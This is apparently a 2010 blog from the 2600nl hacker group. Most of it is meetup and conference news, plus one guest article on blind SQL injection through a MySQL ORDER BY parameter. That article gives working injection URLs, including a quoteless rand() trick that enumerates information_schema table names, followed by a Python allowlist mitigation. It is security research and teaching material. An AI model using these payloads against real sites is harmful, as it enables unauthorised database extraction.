2600nl Hackers in Utrecht

12Jul/100

2600nl@HITB2010AMS && July Meet

Last week Hack in The Box held their first conference in Europe, in Amsterdam in the beautiful Krasnapolsky. Some of us did a lot of volunteering for the event, which was totally worth it. This conference blew me away! We had a lot of good (lightning) talks. HITB also ran HITB Labs, a 2-hour track where stuff like METASM was demonstrated. Too bad the audience didn't really get it, because it's a very nice framework to quickly develop working exploits. We closed the event with the awesome afterparty on a boat, which was sponsored by Microsoft. Thanks guys!

Official pictures from the conference can be found in about 2 weeks at http://photos.hackinthebox.org/ but for some unofficial photos by drwhax you can click this link: http://www.flickr.com/photos/drwhax/tags/hackintheboxamsterdam2010/

And of course the meet also happened! It was a busy month, we can say ;) This Friday some geeks met at a way too hot Central Station in Utrecht, from where we walked to our favourite pub with airco, away from the evil daystar... Most of the time the meet stops around 10 PM, but this time the last group went home around 23:30!!! We also said goodbye to our Malaysian friends; we will see them next year in January, and some in October for the Kuala Lumpur conference!

Ever wanted to participate in a hackerspace, but The Hague or Utrecht is too far away and you live close to Amsterdam? Then don't hesitate and sign up for our next meeting about a hackerspace in Amsterdam! Browse to http://hspace.2600nl.net/wiki for more info!

Also don't forget we have another fine conference coming up in August. It's time for the eth0 summercamp! Same location as their last event: het Boshuis in Wieringerwerf. 2600nl will be doing a CTF and a webhacking challenge. And rumor has it somebody from 2600nl will do a talk about the government. Be scared...

See you at the next meet or the conference!

5Jun/100

The June Meet

It was one of the first real summer days with high temperatures when some geeks left their computer lounge chairs and went to Utrecht to join the famous 2600nl meeting! Some were stuck in traffic, others were sick and others enjoyed taking the train, but everyone made it despite the evil daystar.

Our friends from Hack in The Box joined the meeting as well and, needless to say, they brought some nice Malaysian jokes and quotes with them ;-) I won't post them here though ;>

Also, next time with this awesome weather it might be a good idea to have a place where we can sit outside in the sun; most of us are too white and could use some colour. The pub is having problems also...

And now some news :-)

Next month we won't meet on the first Friday but on the second one (9 July), because on the first we will have a HITB Amsterdam afterparty, and most of us will probably be too tired to travel. ;-)

And while we are talking about HITB Amsterdam... people who visit 2600nl or are longtime IRC mates of ours can register with a big discount! All you need to do is contact drwhax @@@ 2600nl .dot. net or hit me up on IRC :)

I quote from the http://conference.hackinthebox.org/hitbsecconf2010ams/ website

"Welcome to the official homepage of HITBSecConf2010 – Amsterdam – the FIRST EVER HITBSecConf in Europe!!! From our humble beginnings in 2003 with HITBSecConf – Malaysia our event series has grown to not only cover Dubai in the Middle East but our new home in Amsterdam, The Netherlands!

The main aim of the HITBSecConf conference series is to create a truly technical and deep knowledge event in order to allow you to learn first hand on the security threats you face in today's super connected world. The HITBSecConf platform is used to enable the dissemination, discussion and sharing of critical network security information.

Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before. HITBSecConf2010 – Amsterdam will also be a landmark event for us being the first HITBSecConf to feature 4 TRACKS! In addition to the usual Technical Track 1 and Track 2 we’re also bringing our popular HITB Lab sessions and an all new Lightning Talk segment to the Amsterdam conference.

HITBSecConf2010 – Amsterdam will also feature a two-man team based Capture The Flag Live Hacking competition, an Arduino Village, a Hackerspaces Village (with participation from spaces in Utrecht, Den Haag, Brussels, Paris, Vienna and our very own Hackerspace Kuala Lumpur in Malaysia!) In addition to the above, members from TOOOL.nl will be on hand conducting a lock picking village and a hands on lock picking lab as well. There are only 500 seats available for this first ever event and we encourage you to register early! Student pricing for the conference (1st and 2nd July) is only EUR 250!"

So see you next month at the conference or at the meeting! :-)

29May/100

eXploiting SQL injection in ORDER BY clause (MySQL 5)

A good friend of ours made a nice discovery about blind SQL injection! He will explain what's new :-)
It's pretty good stuff!

eXploiting SQL injection in ORDER BY clause (MySQL 5)
by Jacco van Tuijl

This URL will show a list ordered by column 1:

http://www.test.com/list.php?orderby=1

This is what the SQL query that is executed on the database might look like:
SELECT id,name,price FROM list ORDER BY 1

If it is vulnerable to SQL injection, we could try:

http://www.test.com/list.php?orderby=if(true,id,price)

and

http://www.test.com/list.php?orderby=if(false,id,price)

to see if they give a different result

or

http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
and
http://www.test.com/list.php?orderby=(select case when (false) then id else price end)
to see if they give a different result.

If they do give a different result, you might be able to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=if((select ascii(substring(table_name,1,1)) from information_schema.tables limit 1)<=128,id,price)
and this:
http://www.test.com/list.php?orderby=(select case when ((select ascii(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)

The downside of these methods is that they require knowledge of the column names.
So I worked out a different method that doesn't require knowledge of the column names.

ORDER BY rand()

We can make a request like this:

http://www.test.com/list.php?orderby=rand(true)

returns a different result than this request:

http://www.test.com/list.php?orderby=rand(false)

We can use it to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=rand((select ascii(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)

And it is all quoteless!

Greetingz,
Jacco van Tuijl
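
Added example (not part of Jacco's article): the mitigation for everything shown above. ORDER BY takes an identifier, which cannot be bound as a query parameter, so the orderby value has to be mapped through an allowlist of known columns. Python with an in-memory SQLite table stands in for list.php and MySQL here; the function names and the sample rows are assumptions made for this sketch.

```python
import sqlite3

# Allowlist: every accepted orderby value maps to a fixed column identifier.
# Positions and names mirror the article's "SELECT id,name,price FROM list".
ORDER_COLUMNS = {"1": "id", "2": "name", "3": "price",
                 "id": "id", "name": "name", "price": "price"}


def order_by_column(param):
    """Return a trusted column name for the orderby parameter, or raise."""
    if not isinstance(param, str):
        raise ValueError("unsupported orderby value")
    try:
        return ORDER_COLUMNS[param.strip().lower()]
    except KeyError:
        raise ValueError("unsupported orderby value") from None


def list_items(conn, param):
    # Only the allowlisted constant is ever placed in the SQL text;
    # the request value itself never reaches the query.
    column = order_by_column(param)
    return conn.execute(
        f"SELECT id, name, price FROM list ORDER BY {column}").fetchall()


def demo():
    conn = sqlite3.connect(":memory:")  # constructed sample data
    conn.execute("CREATE TABLE list (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO list VALUES (?, ?, ?)",
                     [(1, "cable", 9.5), (2, "adapter", 4.0), (3, "badge", 7.25)])
    results = {"by_id": list_items(conn, "1"),
               "by_price": list_items(conn, "price")}
    # orderby values taken from the article; every one must be refused.
    rejected = []
    for payload in ("if(true,id,price)", "rand(true)", "rand(false)",
                    "(select case when (true) then id else price end)"):
        try:
            list_items(conn, payload)
        except ValueError:
            rejected.append(payload)
    results["rejected"] = rejected
    return results


if __name__ == "__main__":
    print(demo())
```

Because the check is an exact-match lookup rather than a filter on characters, the quoteless rand() variant is refused the same way as the if() and case forms.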

22Apr/100

Eth0:2010 Summer

After co-organising Hacking at Random 2009 and organising their winter edition, eth0 is back with a summer edition!

The winter edition was a blast with a fine location and great talks. The summer edition can only get better!
That's why the guys and girls from eth0 will bring us another camp in August :D

The location is the same as the winter edition, so it's in Wieringerwerf, "het Boshuis", again, which is an excellent location for events like this. So if I were you I would invite my friends over to summercamp and have some fun ;-)

However, they also want some help: they are still looking for speakers/workshops on various subjects such as privacy, security, hackerspaces and more. If you have something that would be cool to talk about, check this out: http://eth-0.nl/cfp.php

But I'm sure you're going, and they have a nice feature for early deciders: a 35 euro discount on the early bird tickets! So for quick deciders: https://secure.eth-0.nl/tickets/summer2010/

2600nl will be present with randomdata and friends again in our famous "Hack in the random 2600 box" village. And we will throw up a wargame. If you want to submit any levels, mail to: drwhax @!@!@ 2600nl dot... net

See you there ;-)

Flyer: http://wiki.eth-0.nl/images/4/43/Flyer_summer_2010_a5.svg
